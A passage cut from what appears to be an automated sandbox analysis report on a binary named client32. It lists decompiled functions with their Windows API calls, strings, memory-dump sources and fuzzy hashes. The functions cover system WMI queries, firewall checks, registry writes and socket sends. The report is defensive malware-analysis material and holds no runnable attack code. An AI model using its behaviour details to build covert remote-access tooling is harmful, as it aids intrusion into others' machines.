                                                                                                • Instruction Fuzzy Hash: 8931AF35E01729ABDB00CFA8CC81BEEFBF4AB49714F104299E826A72C0DB756940C791
                                                                                                Function 11163CB2 Relevance: 10.6, APIs: 7, Instructions: 74COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RtlDecodePointer.NTDLL(?,?,?,?,?,11163DB6,?,111DCCE0,0000000C,11163DE2,?,?,1116E4BB,11177F11), ref: 11163CC7
                                                                                                • DecodePointer.KERNEL32(?,?,?,?,?,11163DB6,?,111DCCE0,0000000C,11163DE2,?,?,1116E4BB,11177F11), ref: 11163CD4
                                                                                                • __realloc_crt.LIBCMT ref: 11163D11
                                                                                                • __realloc_crt.LIBCMT ref: 11163D27
                                                                                                • EncodePointer.KERNEL32(00000000,?,?,?,?,?,11163DB6,?,111DCCE0,0000000C,11163DE2,?,?,1116E4BB,11177F11), ref: 11163D39
                                                                                                • EncodePointer.KERNEL32(?,?,?,?,?,?,11163DB6,?,111DCCE0,0000000C,11163DE2,?,?,1116E4BB,11177F11), ref: 11163D4D
                                                                                                • EncodePointer.KERNEL32(-00000004,?,?,?,?,?,11163DB6,?,111DCCE0,0000000C,11163DE2,?,?,1116E4BB,11177F11), ref: 11163D55
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Pointer$Encode$Decode__realloc_crt
                                                                                                • String ID:
                                                                                                • API String ID: 4108716018-0
                                                                                                • Opcode ID: 78b66c0ccf40e1ea873e96cc16d33ba7024ac8dccc44993d1929be3c3bf886a8
                                                                                                • Instruction ID: 9b559eab580439f7d32e9cac7dbac1f1bc4b8bf1504d6bec0d436b7e194fb771
                                                                                                • Opcode Fuzzy Hash: 78b66c0ccf40e1ea873e96cc16d33ba7024ac8dccc44993d1929be3c3bf886a8
                                                                                                • Instruction Fuzzy Hash: EA11D632518236AFDB005F79DCD488EFBEDEB41268751043AE819D7211EBB2ED54DB80
                                                                                                Function 110178F0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 71synchronizationCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • WaitForSingleObject.KERNEL32(0000018C,000000FF), ref: 1101792C
                                                                                                • CoInitialize.OLE32(00000000), ref: 11017935
                                                                                                • _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101795C
                                                                                                • CoUninitialize.OLE32 ref: 110179C0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                                • String ID: PCSystemTypeEx$Win32_ComputerSystem
                                                                                                • API String ID: 2407233060-578995875
                                                                                                • Opcode ID: 0942cf205f413e43a7dce2a9957458248f39d685d8b5fb2cae19ac9a1649f750
                                                                                                • Instruction ID: 979ee595df3e366e36f6db43f9274242a875182caa54ddfda208ac7f01cc4ef4
                                                                                                • Opcode Fuzzy Hash: 0942cf205f413e43a7dce2a9957458248f39d685d8b5fb2cae19ac9a1649f750
                                                                                                • Instruction Fuzzy Hash: BE213EB5D0166A9FDB11CFA48C40BBAB7E99F4170CF0000B4EC59DB188EB79D544D791
                                                                                                Function 11017810 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70synchronizationCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • WaitForSingleObject.KERNEL32(0000018C,000000FF), ref: 11017842
                                                                                                • CoInitialize.OLE32(00000000), ref: 1101784B
                                                                                                • _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017872
                                                                                                • CoUninitialize.OLE32 ref: 110178D0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                                • String ID: ChassisTypes$Win32_SystemEnclosure
                                                                                                • API String ID: 2407233060-2037925671
                                                                                                • Opcode ID: 645120171e4998cce48753e45b0062292f56c9bef21460c25a07f93c3742c313
                                                                                                • Instruction ID: 35f99737241494c501e89beb979cd88c9c6eddc8ed8b09fe319fdcc96c080ea2
                                                                                                • Opcode Fuzzy Hash: 645120171e4998cce48753e45b0062292f56c9bef21460c25a07f93c3742c313
                                                                                                • Instruction Fuzzy Hash: D7210875D4112A9BD711CFA4CD40BAEBBE89F40309F0000A4EC29DB244EE75D910C7A0
                                                                                                Function 11139600 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 68COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32(756F13E0,1103070D,Client,UseIPC,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 1113962A
                                                                                                • GetTickCount.KERNEL32(756F13E0,1103070D,Client,UseIPC,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11139631
                                                                                                Strings
                                                                                                • AutoICFConfig, xrefs: 11139650
                                                                                                • DesktopTimerProc - Further ICF config checking will not be performed, xrefs: 111396EC
                                                                                                • Client, xrefs: 11139655
                                                                                                • DoICFConfig() OK, xrefs: 111396D6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CountTick
                                                                                                • String ID: AutoICFConfig$Client$DesktopTimerProc - Further ICF config checking will not be performed$DoICFConfig() OK
                                                                                                • API String ID: 536389180-1512301160
                                                                                                • Opcode ID: e88b596b7c5c4cd1ec5207dbc2eaab29f042a609f248b0ca23653edaa92bfa31
                                                                                                • Instruction ID: a12453e9faa0d912da9f55e5525ca7a81223e7cd1b6d2efb44fc6fc6c8488c0a
                                                                                                • Opcode Fuzzy Hash: e88b596b7c5c4cd1ec5207dbc2eaab29f042a609f248b0ca23653edaa92bfa31
                                                                                                • Instruction Fuzzy Hash: 2B21277CA262AF4AFB12CE75DED4791FA92278232EF010178D515862CCFBB49448CF46
                                                                                                Function 69CE9C49 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66sleeptimenetworkCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • send.WSOCK32(?,?,?,00000000), ref: 69CE9C93
                                                                                                • timeGetTime.WINMM ref: 69CE9CD0
                                                                                                • Sleep.KERNEL32(00000000), ref: 69CE9CDE
                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 69CE9D4F
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 69CE9D72
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalIncrementInterlockedLeaveSectionSleepTimesendtime
                                                                                                • String ID: 3'
                                                                                                • API String ID: 77915721-280543908
                                                                                                • Opcode ID: ae9c6ab9ac68420c14e6cabe3168a21ac3b6aa977af58346f62a363bd5e66797
                                                                                                • Instruction ID: 89dc8e9f7db6ba014ab0ee258dd0ea7b3812b404d618d0622bdbd17022587388
                                                                                                • Opcode Fuzzy Hash: ae9c6ab9ac68420c14e6cabe3168a21ac3b6aa977af58346f62a363bd5e66797
                                                                                                • Instruction Fuzzy Hash: 2F218175A041288FEB20DF64DD99B9AB7B4BF05364F0182D5D90E97241E730ED85CF91
                                                                                                Function 11096D90 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 58comCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CoInitialize.OLE32(00000000), ref: 11096DA4
                                                                                                • CLSIDFromProgID.OLE32(HNetCfg.FwMgr,?), ref: 11096DBE
                                                                                                • CoCreateInstance.OLE32(?,00000000,00000001,111C1B4C,?), ref: 11096DDB
                                                                                                • CoUninitialize.OLE32 ref: 11096DF9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateFromInitializeInstanceProgUninitialize
                                                                                                • String ID: HNetCfg.FwMgr$ICF Present:
                                                                                                • API String ID: 3222248624-258972079
                                                                                                • Opcode ID: 2f37d598b4012c0c7ec1fc3c7a41f1831d77099e3c9549bb0708a0a7a71d465f
                                                                                                • Instruction ID: 9199824aa3bd6ebf99e58618a68c234682766c17c5e3bd8f83aabb27c1d0aea9
                                                                                                • Opcode Fuzzy Hash: 2f37d598b4012c0c7ec1fc3c7a41f1831d77099e3c9549bb0708a0a7a71d465f
                                                                                                • Instruction Fuzzy Hash: BC11C235F4111DABC700EFA59C84EEFFF789F44705B500468E51ADB104EA25A980C7E1
                                                                                                Function 110262F0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026306
                                                                                                • K32GetProcessImageFileNameA.KERNEL32(?,00000000,11030983,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026322
                                                                                                • GetProcAddress.KERNEL32(?,GetModuleFileNameExA,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026336
                                                                                                • SetLastError.KERNEL32(00000078,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026359
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc$ErrorFileImageLastNameProcess
                                                                                                • String ID: GetModuleFileNameExA$GetProcessImageFileNameA
                                                                                                • API String ID: 4186647306-532032230
                                                                                                • Opcode ID: 168c0276823b5447779d0ea544bca84f700d76740b4f854a777d5a44096f3b0a
                                                                                                • Instruction ID: 183e1746e0b9fc2934bd9ec846e99aaf72a90bbb460a81bb2001b4ad07131d97
                                                                                                • Opcode Fuzzy Hash: 168c0276823b5447779d0ea544bca84f700d76740b4f854a777d5a44096f3b0a
                                                                                                • Instruction Fuzzy Hash: BE012D72A41319ABE720DEA5EC44F4BB7E8EB88765F40452AF955D7600D630E8048BA0
                                                                                                Function 11110040 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 52synchronizationthreadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,774E42C0,00000000,?,11110F55,11110AF0,00000001,00000000), ref: 11110057
                                                                                                • CreateThread.KERNEL32(00000000,11110F55,00000001,00000000,00000000,0000000C), ref: 1111007A
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,11110F55,11110AF0,00000001,00000000,?,?,?,?,?,11031700), ref: 111100A7
                                                                                                • CloseHandle.KERNEL32(?), ref: 111100B1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                • String ID: ..\ctl32\Refcount.cpp$hThread
                                                                                                • API String ID: 3360349984-1136101629
                                                                                                • Opcode ID: 4687833a1936dd26f91b2846a9cb7115301389be075d2048120d977a93bdefe6
                                                                                                • Instruction ID: 76930d23ba1481c48ceb924dc08d7adf498fcac35268297604c83f904cd53e19
                                                                                                • Opcode Fuzzy Hash: 4687833a1936dd26f91b2846a9cb7115301389be075d2048120d977a93bdefe6
                                                                                                • Instruction Fuzzy Hash: A0018435780715BFF3208EA5CD85F57FBA9DB45765F104138FA259B6C4D670E8048BA0
                                                                                                Function 11116D50 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 51registryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RegOpenKeyExA.KERNEL32(80000002,System\CurrentControlSet\Control\GraphicsDrivers\DCI,00000000,0002001F,?), ref: 11116D7F
                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 11116DB7
                                                                                                • RegSetValueExA.ADVAPI32(00000000,Timeout,00000000,00000004,00000000,00000004), ref: 11116DD3
                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 11116DDD
                                                                                                  • Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32 ref: 11143BF0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseValue$OpenQuery
                                                                                                • String ID: System\CurrentControlSet\Control\GraphicsDrivers\DCI$Timeout
                                                                                                • API String ID: 3962714758-504756767
                                                                                                • Opcode ID: 71a3d5382f694e300ca8b739a0447eaf7c0fd6e11b25d11c78922669bca80467
                                                                                                • Instruction ID: 446fff0cae762a3aa9587799f73bfd878db9d5469a1de9e4663b70f0b9132e6a
                                                                                                • Opcode Fuzzy Hash: 71a3d5382f694e300ca8b739a0447eaf7c0fd6e11b25d11c78922669bca80467
                                                                                                • Instruction Fuzzy Hash: 9E019E75640208BBEB14DBA0CE49FEEF77CAF04705F108158FE14AA5C5DBB0AA04CB65
                                                                                                Function 11032020 Relevance: 9.0, APIs: 1, Strings: 5, Instructions: 28COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: wsprintf
                                                                                                • String ID: %s%s%s.bin$445817$_HF$_HW$_SW
                                                                                                • API String ID: 2111968516-1929130765
                                                                                                • Opcode ID: 503f2c815b640c3d0002ea6c51c91ecd6f409461de15ff16a7ff97f3048ceaf6
                                                                                                • Instruction ID: fa910be19caf0a14a4f119543ead50e584fafd0cecff00e00c2366bf95bcdf21
                                                                                                • Opcode Fuzzy Hash: 503f2c815b640c3d0002ea6c51c91ecd6f409461de15ff16a7ff97f3048ceaf6
                                                                                                • Instruction Fuzzy Hash: 2AE092A4E5460C9BF300A6498C11BAAFACC174475BFC4C051BFF9AB6A3E9299904C6D2
                                                                                                Function 69CF6940 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 166COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32 ref: 69CF6950
                                                                                                  • Part of subcall function 69CF7BE0: _memset.LIBCMT ref: 69CF7BFF
                                                                                                  • Part of subcall function 69CF7BE0: _strncpy.LIBCMT ref: 69CF7C0B
                                                                                                  • Part of subcall function 69CEA4E0: EnterCriticalSection.KERNEL32(69D2B898,00000000,?,?,?,69CEDA7F,?,00000000), ref: 69CEA503
                                                                                                  • Part of subcall function 69CEA4E0: InterlockedExchange.KERNEL32(?,00000000,?,69CEDA7F,?,00000000), ref: 69CEA568
